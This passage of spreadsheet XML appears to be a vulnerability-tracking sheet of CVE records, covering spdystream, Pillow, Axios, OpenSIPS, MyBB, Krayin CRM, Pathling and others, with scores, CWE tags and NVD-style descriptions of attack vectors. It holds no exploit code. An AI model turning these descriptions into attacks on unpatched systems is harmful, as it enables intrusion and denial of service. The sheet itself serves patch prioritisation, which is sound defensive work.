      <c r="C1111" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1111" s="5" t="inlineStr"/>
      <c r="F1111" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1111" s="5" t="inlineStr"/>
      <c r="H1111" s="5" t="inlineStr"/>
      <c r="I1111" s="5" t="inlineStr">
        <is>
          <t>2026-04-16</t>
        </is>
      </c>
      <c r="J1111" s="5" t="inlineStr"/>
      <c r="K1111" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1111" s="5" t="inlineStr">
        <is>
          <t>spdystream is a Go library for multiplexing streams over SPDY connections. In versions 0.5.0 and below, the SPDY/3 frame parser does not validate attacker-controlled counts and lengths before allocating memory. Three allocation paths are affected: the SETTINGS frame entry count, the header count in parseHeaderValueBlock, and individual header field sizes — all read as 32-bit integers and used directly as allocation sizes with no bounds checking. Because SPDY header blocks are zlib-compressed, a small on-the-wire payload can decompress into large attacker-controlled values. A remote peer that can send SPDY frames to a service using spdystream can exhaust process memory and cause an out-of-memory crash with a single crafted control frame. This issue has been fixed in version 0.5.1.</t>
        </is>
      </c>
      <c r="M1111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35469</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40192</t>
        </is>
      </c>
      <c r="C1112" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1112" s="5" t="inlineStr"/>
      <c r="F1112" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1112" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1112" s="5" t="inlineStr">
        <is>
          <t>python:pillow</t>
        </is>
      </c>
      <c r="I1112" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J1112" s="5" t="inlineStr"/>
      <c r="K1112" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L1112" s="5" t="inlineStr">
        <is>
          <t>Pillow is a Python imaging library. Versions 10.3.0 through 12.1.1 did not limit the amount of GZIP-compressed data read when decoding a FITS image, making them vulnerable to decompression bomb attacks. A specially crafted FITS file could cause unbounded memory consumption, leading to denial of service (OOM crash or severe performance degradation). If users are unable to immediately upgrade, they should only open specific image formats, excluding FITS, as a workaround.</t>
        </is>
      </c>
      <c r="M1112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40192</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40877</t>
        </is>
      </c>
      <c r="C1113" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1113" s="5" t="inlineStr"/>
      <c r="F1113" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1113" s="5" t="inlineStr"/>
      <c r="H1113" s="5" t="inlineStr"/>
      <c r="I1113" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1113" s="5" t="inlineStr"/>
      <c r="K1113" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-94</t>
        </is>
      </c>
      <c r="L1113" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to PHP object injection in the user preference functionality, which can lead to remote code execution. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40877</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41453</t>
        </is>
      </c>
      <c r="C1114" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1114" s="5" t="inlineStr"/>
      <c r="F1114" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1114" s="5" t="inlineStr"/>
      <c r="H1114" s="5" t="inlineStr"/>
      <c r="I1114" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1114" s="5" t="inlineStr"/>
      <c r="K1114" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1114" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM before 2.2.4 contains a blind SQL injection vulnerability in the leads DataGrid that allows authenticated users with leads access to inject arbitrary SQL into a HAVING clause by manipulating the rotten_lead[in] query parameter, which is concatenated without parameterized binding directly into a havingRaw() call in LeadDataGrid.php. Attackers can exploit this flaw using time-based and boolean-based blind injection techniques to extract the entire database contents, including user credential hashes, CRM records, and application configuration data.</t>
        </is>
      </c>
      <c r="M1114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41453</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41674</t>
        </is>
      </c>
      <c r="C1115" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1115" s="5" t="inlineStr"/>
      <c r="F1115" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1115" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1115" s="5" t="inlineStr"/>
      <c r="I1115" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J1115" s="5" t="inlineStr"/>
      <c r="K1115" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1115" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13.</t>
        </is>
      </c>
      <c r="M1115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41674</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44494</t>
        </is>
      </c>
      <c r="C1116" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1116" s="5" t="inlineStr"/>
      <c r="F1116" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1116" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1116" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1116" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1116" s="5" t="inlineStr"/>
      <c r="K1116" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441, CWE-915</t>
        </is>
      </c>
      <c r="L1116" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.</t>
        </is>
      </c>
      <c r="M1116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44494</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45084</t>
        </is>
      </c>
      <c r="C1117" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1117" s="5" t="inlineStr"/>
      <c r="F1117" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1117" s="5" t="inlineStr"/>
      <c r="H1117" s="5" t="inlineStr"/>
      <c r="I1117" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1117" s="5" t="inlineStr"/>
      <c r="K1117" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1117" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions 3.4.0 through 3.6.5 contain a denial of service vulnerability in the presence module. When the presence module's handle_publish() function processes a SIP PUBLISH request with an Event: presence header and a message body while the configuration option enable_sphere_check=1 is set, it invokes the get_content_type() macro without first calling parse_content_type_hdr(), causing it to dereference uninitialized or NULL Content-Type parsing state and crash. If a Content-Type header is present but unparsed, msg-&gt;content_type-&gt;parsed is NULL and is dereferenced as a content_t pointer; if the request lacks a Content-Type header entirely, msg-&gt;content_type itself is NULL, and both cases lead to a crash. A remote attacker can therefore cause a denial of service against an affected instance with a single PUBLISH request over UDP or TCP, using either a valid Content-Type: application/pidf+xml request or one with the header removed, and the vulnerable code path itself does not enforce authentication (though a deployment's routing configuration may require it before this route is reached). The issue has been fixed in version 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M1117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45084</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45115</t>
        </is>
      </c>
      <c r="C1118" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1118" s="5" t="inlineStr"/>
      <c r="F1118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1118" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1118" s="5" t="inlineStr"/>
      <c r="I1118" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1118" s="5" t="inlineStr"/>
      <c r="K1118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1118" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Buddy/Ignore component does not sanitize usernames correctly, allowing attackers to perform JavaScript code injection through a specially crafted username. The User CP Buddy/Ignore list and the Select Buddies list in Private Messages pass usernames through htmlspecialchars_uni(), which may leave single quotes unescaped. The payload is triggered when a victim chooses Yes in Please Confirm while removing the username in usercp.php, or selects the username through the onclick handler in the xmlhttp.php Select Buddies popup. The uniquely identifying implementation details include Private Messages Select Buddies list, and unescaped single quotes. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M1118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45115</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45116</t>
        </is>
      </c>
      <c r="C1119" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1119" s="5" t="inlineStr"/>
      <c r="F1119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1119" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1119" s="5" t="inlineStr"/>
      <c r="I1119" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1119" s="5" t="inlineStr"/>
      <c r="K1119" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1119" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the user datahandler does not properly validate checkbox and multiselect profile field types, resulting in stored JavaScript code injection. UserDataHandler::verify_profile_fields() only performs the specialized validation when is_array($profile_fields[$field]) is true. A non-array profile_fields[fidX] value instead of the expected profile_fields[fidX][] shape falls through to generic text handling and is stored without verification. The affected value is then rendered directly by member.php and inc/functions_post.php rather than processed by the MyCode parser. The uniquely identifying implementation details include inc/datahandlers/user.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M1119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45116</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45273</t>
        </is>
      </c>
      <c r="C1120" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1120" s="5" t="inlineStr"/>
      <c r="F1120" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1120" s="5" t="inlineStr"/>
      <c r="H1120" s="5" t="inlineStr"/>
      <c r="I1120" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1120" s="5" t="inlineStr"/>
      <c r="K1120" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1120" s="5" t="inlineStr">
        <is>
          <t>MyBooks is an ebook management web server also known as Talebook. In 3.41.2 and earlier, the AdminSettings.post handler for POST /api/admin/settings in webserver/handlers/admin.py applies the auth decorator but does not check the self.admin_user property, unlike the corresponding GET handler. Any authenticated regular user can therefore overwrite server configuration values including SMTP credentials, OAuth client secrets, storage paths, security feature flags, and autoreload settings. The process_auth_header function in webserver/handlers/base.py also fails to verify the matched account's active flag, allowing a registered but unactivated account to authenticate and reach the vulnerable handler. Exploitation can disclose secrets through configuration access paths, sabotage application behavior, force service restarts, and supply the settings needed for related code-injection attacks. This issue is fixed in version 3.42.0.</t>
        </is>
      </c>
      <c r="M1120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45273</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45809</t>
        </is>
      </c>
      <c r="C1121" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1121" s="5" t="inlineStr"/>
      <c r="F1121" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1121" s="5" t="inlineStr"/>
      <c r="H1121" s="5" t="inlineStr"/>
      <c r="I1121" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1121" s="5" t="inlineStr"/>
      <c r="K1121" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1121" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions prior to 3.6.6 and 4.0.0-rc1 contain a denial of service vulnerability in the watcherinfo generation functionality. An attacker can create an oversized watcher entry by sending a SUBSCRIBE Event: presence request with a long From URI, and then trigger presence.winfo watcherinfo XML generation for the same presentity. OpenSIPS copies the stored watcher URI into a fixed-size stack buffer, overflowing it and crashing the process. A remote attacker can crash an OpenSIPS worker in deployments that expose handle_subscribe() and allow watcherinfo (presence.winfo) generation. The issue is configuration-dependent because the presence and presence_xml modules must be loaded and SUBSCRIBE routing must be reachable. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M1121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45809</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46334</t>
        </is>
      </c>
      <c r="C1122" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1122" s="5" t="inlineStr"/>
      <c r="F1122" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1122" s="5" t="inlineStr"/>
      <c r="H1122" s="5" t="inlineStr"/>
      <c r="I1122" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1122" s="5" t="inlineStr"/>
      <c r="K1122" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-476</t>
        </is>
      </c>
      <c r="L1122" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions prior to 3.6.6 and 4.0.0-rc1 contain a denial of service vulnerability in the SDP bandwidth-line parsing logic. A SIP request with Content-Type: application/sdp and a malformed session-level SDP bandwidth line missing the required colon delimiter can corrupt parsed SDP bandwidth metadata. When a route or module subsequently clones the corrupted SDP state, as occurs with dialog and QoS processing, the OpenSIPS worker process crashes. An unauthenticated remote attacker can therefore trigger a crash in any configuration whose routing script parses attacker-controlled SDP and applies dialog/QoS processing. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M1122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46334</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46382</t>
        </is>
      </c>
      <c r="C1123" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1123" s="5" t="inlineStr"/>
      <c r="F1123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1123" s="5" t="inlineStr"/>
      <c r="H1123" s="5" t="inlineStr"/>
      <c r="I1123" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1123" s="5" t="inlineStr"/>
      <c r="K1123" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1123" s="5" t="inlineStr">
        <is>
          <t>The Meeting Room Booking System (MRBS) is a PHP-based application for booking meeting rooms. Prior to version 1.12.2, a user-supplied private/local URI can be made to be fetched without checks. Version 1.12.2 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M1123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46382</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46384</t>
        </is>
      </c>
      <c r="C1124" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1124" s="5" t="inlineStr"/>
      <c r="F1124" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1124" s="5" t="inlineStr"/>
      <c r="H1124" s="5" t="inlineStr"/>
      <c r="I1124" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J1124" s="5" t="inlineStr"/>
      <c r="K1124" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1124" s="5" t="inlineStr">
        <is>
          <t>iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, several Avro decoder paths read attacker-controlled 64-bit values from the wire format and either narrowed them to platform-sized int before bounds-checking, or summed them with overflow-prone signed-int arithmetic. On 32-bit targets (GOARCH=386, arm, mips, wasm, etc.), the truncation paths can silently bypass byte-slice limits, select the wrong union branch, or hit the OCF negative-make panic via wrap. Three sub-issues are not 32-bit-specific: cumulative-size arithmetic overflow in arrayDecoder.Decode / mapDecoder.Decode / mapDecoderUnmarshaler.Decode (wraps at math.MaxInt64 on amd64 / arm64 and bypasses MaxSliceAllocSize / MaxMapAllocSize), math.MinInt negation in block-header handling, and make([]byte, size) with a negative size in OCF block reads — all three panic or bypass caps on any platform, giving an attacker a denial-of-service primitive there. This vulnerability is fixed in 2.33.0.</t>
        </is>
      </c>
      <c r="M1124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46384</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46385</t>
        </is>
      </c>
      <c r="C1125" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1125" s="5" t="inlineStr"/>
      <c r="F1125" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1125" s="5" t="inlineStr"/>
      <c r="H1125" s="5" t="inlineStr"/>
      <c r="I1125" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J1125" s="5" t="inlineStr"/>
      <c r="K1125" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="L1125" s="5" t="inlineStr">
        <is>
          <t>iskorotkov/avro is a fast Go Avro codec. Prior to 2.33.0, the Avro array and map decoders looped over an attacker-controlled block-count value without checking the underlying reader's error state inside the loop body. Reader.ReadBlockHeader returns the count as a Go int, which is 64-bit on amd64 / arm64 targets — so a producer can declare a block of up to math.MaxInt64 (~9.2 × 10¹⁸) elements followed by EOF (or any truncated payload), and the decoder will attempt that many no-op iterations before propagating the error. The realistic ceiling is "indefinite until the worker is killed externally" — a single hostile payload pins a CPU core until the process is OOM-killed, deadline-cancelled, or terminated. Remote, unauthenticated denial-of-service. This vulnerability is fixed in 2.33.0.</t>
        </is>
      </c>
      <c r="M1125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46385</t>
        </is>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46636</t>
        </is>
      </c>
      <c r="C1126" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1126" s="5" t="inlineStr"/>
      <c r="F1126" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1126" s="5" t="inlineStr"/>
      <c r="H1126" s="5" t="inlineStr"/>
      <c r="I1126" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1126" s="5" t="inlineStr"/>
      <c r="K1126" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1126" s="5" t="inlineStr">
        <is>
          <t>Twig is a template language for PHP. From version 1.0.0 to before version 3.27.0, SecurityPolicy::checkMethodAllowed() unconditionally whitelists all method calls on instances of Twig\Markup. Twig\Markup is not final, so subclasses inherit the bypass. An application that passes an object of a Markup-derived class into a sandboxed template (typically to mark a chunk of HTML as safe) inadvertently exposes every public method of that subclass to template authors, regardless of the configured allowedMethods list. This issue has been patched in version 3.27.0.</t>
        </is>
      </c>
      <c r="M1126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46636</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47659</t>
        </is>
      </c>
      <c r="C1127" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1127" s="5" t="inlineStr"/>
      <c r="F1127" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1127" s="5" t="inlineStr"/>
      <c r="H1127" s="5" t="inlineStr"/>
      <c r="I1127" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1127" s="5" t="inlineStr"/>
      <c r="K1127" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-918</t>
        </is>
      </c>
      <c r="L1127" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's `/$result` endpoint allows a caller who can obtain any valid async export job ID to supply `file` parameter values containing path traversal sequences. The handler verifies only the supplied `job` and never normalises or confines the requested `file` path to that job's `jobs/&lt;jobId&gt;` directory before opening it as a filesystem resource. Because async export scratch space lives under the same warehouse database root as persisted resource tables, an attacker can use their own export job to read other files from the warehouse. This is fixed in Pathling Server 2.0.0. The `$result` handler now resolves and canonicalizes the requested file path and rejects any request that escapes the job's `jobs/&lt;jobId&gt;` directory. As an interim mitigation, disable the async export operations (`pathling.operations.exportEnabled`, `patientExportEnabled`, `groupExportEnabled`, `bulkSubmitEnabled`) or enable authentication and restrict export capability to trusted callers.</t>
        </is>
      </c>
      <c r="M1127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47659</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47660</t>
        </is>
      </c>
      <c r="C1128" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1128" s="5" t="inlineStr"/>
      <c r="F1128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1128" s="5" t="inlineStr"/>
      <c r="H1128" s="5" t="inlineStr"/>
      <c r="I1128" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1128" s="5" t="inlineStr"/>
      <c r="K1128" s="5" t="inlineStr">
        <is>
          <t>CWE-522, CWE-918</t>
        </is>
      </c>
      <c r="L1128" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's bulk-submit operation allows an allowed submitter to supply an explicit `oauthMetadataUrl` parameter that is not validated against `pathling.bulkSubmit.allowableSources`. When present, the bulk-submit OAuth flow trusts metadata and the returned `token_endpoint` from the caller-chosen location, then builds outbound OAuth client authentication directly from the submitter's stored credentials. This is fixed in Pathling Server 2.0.0.</t>
        </is>
      </c>
      <c r="M1128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47660</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47661</t>
        </is>
      </c>
      <c r="C1129" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1129" s="5" t="inlineStr"/>
      <c r="F1129" s="5" t="n">
        <v>0.005</v>
      </c>
